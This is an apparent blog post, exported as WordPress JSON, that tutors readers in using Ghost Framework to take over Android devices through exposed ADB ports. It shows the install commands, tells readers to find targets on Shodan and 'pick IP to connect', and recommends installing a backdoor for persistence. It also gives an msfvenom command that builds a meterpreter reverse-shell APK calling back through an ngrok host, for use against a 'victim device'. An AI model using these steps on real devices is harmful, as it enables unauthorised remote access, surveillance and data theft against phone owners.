{"id":11882,"date":"2022-01-03T07:11:19","date_gmt":"2022-01-03T07:11:19","guid":{"rendered":"https:\/\/www.securedyou.com\/?p=11882"},"modified":"2022-01-03T15:21:09","modified_gmt":"2022-01-03T15:21:09","slug":"ghost-framework-android-windows","status":"publish","type":"post","link":"https:\/\/www.securedyou.com\/ghost-framework-android-windows\/","title":{"rendered":"Ghost Framework for Android and Windows Download (Latest)"},"content":{"rendered":"
<\/p>\n
You have landed at the right place as we have covered step by step how to exploit Android ADB to get the long-term connection back to the attacker machine. As an attacker machine one can use Kali Linux, exploit, and set up a back door channel once the android devices have been hacked. This can be achieved with the Ghost Framework Download<\/strong> that is available for Android<\/strong> and Windows<\/strong>. We have also included a tutorial on installation<\/strong> and usage for you in Kali Linux<\/strong> and Termux<\/strong><\/a>.<\/p>\n This is not a hacking tool and to be honest, we are not going to hack any android device, this is an Android post-exploitation that is used to exploit Android Debug Bridge in order to remotely access the device. So, this is a tool that provides a consistent connection and works as a backdoor.<\/p>\n Now, for all who do not know what ADB is, it is a feature or command-line tool released by Android with the purpose to remotely connect as well as operate Android devices but security thefts are able to exploit such features and connect hacked devices.<\/p>\n With this perform tasks which are not suitable for everyday use such as:<\/p>\n <\/p>\n This is simple yet easy to understand and quite easy to master it.<\/p>\n 2. Allows you to bypass and remove passwords<\/strong><\/p>\n It can be used to remove a password in case one forgets it.<\/p>\n 3. Provides full shell-level access<\/strong><\/p>\n It can be used to access the device\u2019s shell without using OpenSSH or any other protocol.<\/p>\n <\/p>\n We begin by installing it in Kali Linux.<\/p>\n So, here one can see all commands with descriptions.<\/p>\n Now, we are going to use the connect command with purpose to connect remote device as we mentioned earlier which exploits ADB. Make sure that ADB port 5555 is open.<\/p>\n Open the device, if you have hacked the device.<\/p>\n So, for demonstration, we shall look into Shodan for ADB-enabled devices.<\/p>\n After this pick IP to connect.<\/p>\n We are now connected which means we have got another session and can reconnect to the hacked device over again as long as the port is open.<\/p>\n For now, we can perform many things such as:<\/p>\n Sys info and many other can be done but most importantly one can install backdoor for future and to have persistent connection.<\/p>\n This is how it exploits ADB and provides a good connection to any android device remotely.<\/p>\n READ ALSO:<\/strong> Download Hack App Data Pro APK (700 KB).<\/a><\/p>\n <\/p>\n Don\u2019t use email which has access to any private information or work email. Try using temporary emails when performing penetration testing. Please use a temporary email<\/a> that can be recycled afterward.<\/p>\n READ ALSO:<\/strong> Freedom APK No Root Download.<\/a><\/p>\n Make sure to paste it in the same directory where you have Ngrok.<\/p>\n For now, you are set to use this tool, in terminal type following:<\/p>\n Forwarding over here specifies TCP tunnel which it has created, the connection has bound to Localhost at port 4242. Using msfvenom we are going to generate a malicious payload. You should read our list of Metasploit Commands that can also be used in Termux<\/a>.<\/p>\n Make sure to allow the option to get it from third-party sources.<\/p>\n This is how all is done and get access over the net rather than LAN. Once you have got the session, an attacker can easily have:<\/p>\n Therefore, it is important to have access to a phone device which is quite easy when there is no awareness.<\/p>\n This exploit has been tested on version 9.0 which is not old and still used by many people. Make sure to secure your device by not installing any app from an unknown source, try to read and examine its source code to have an idea of either it is safe or not. There is also a video version of the above tutorial<\/a> for preference.<\/p>\n RECOMMENDED:<\/strong> Termux Commands for Wifi and Facebook Password Hacking.<\/a><\/p>\n <\/p>\nWhat is Ghost Framework<\/strong><\/h2>\n
\n
Why use Ghost Framework (3 reasons)<\/strong><\/h3>\n
\n
How To Install Ghost Framework in Kali Linux or Termux<\/strong><\/h2>\n
\n
git clone https:\/\/www.github.com\/entynetproject\/ghost.git\r\n<\/code><\/pre>\n
\n
.\/install.sh\r\n<\/code><\/pre>\n
\n
.\/ghost\r\n<\/code><\/pre>\n
\n
Help\r\n<\/code><\/pre>\n
Connect IP Address \/ Example: Connect 192.168.72.56\r\n<\/code><\/pre>\n
\n
How to use Ghost Framework (A Step-by-step guide)<\/strong><\/h2>\n
Install Ngrok<\/strong><\/h3>\n
\n
\n
Now it is time to take the generated token<\/strong><\/h3>\n
\n
SecuredYou# .\/ngrok tcp [Port no:]\u00a0\r\n<\/code><\/pre>\n
\n
SecuredYou# msfvenom -p android\/meterpreter\/reverse_tcp LHOST=0.tcp.ngrok.io LPORT=10900 R > \/root\/Desktop\/Shaheer\/payload.apk\r\n<\/code><\/pre>\n
Reversing the TCP handle<\/strong><\/h3>\n
\n
Retrieve meterpreter session from the victim device<\/strong><\/h3>\n
\n
\n
\n
Ghost Framework Alternatives<\/strong><\/h2>\n
\n
Ghost Framework Download 2022 – Android Remote Access<\/strong><\/h2>\n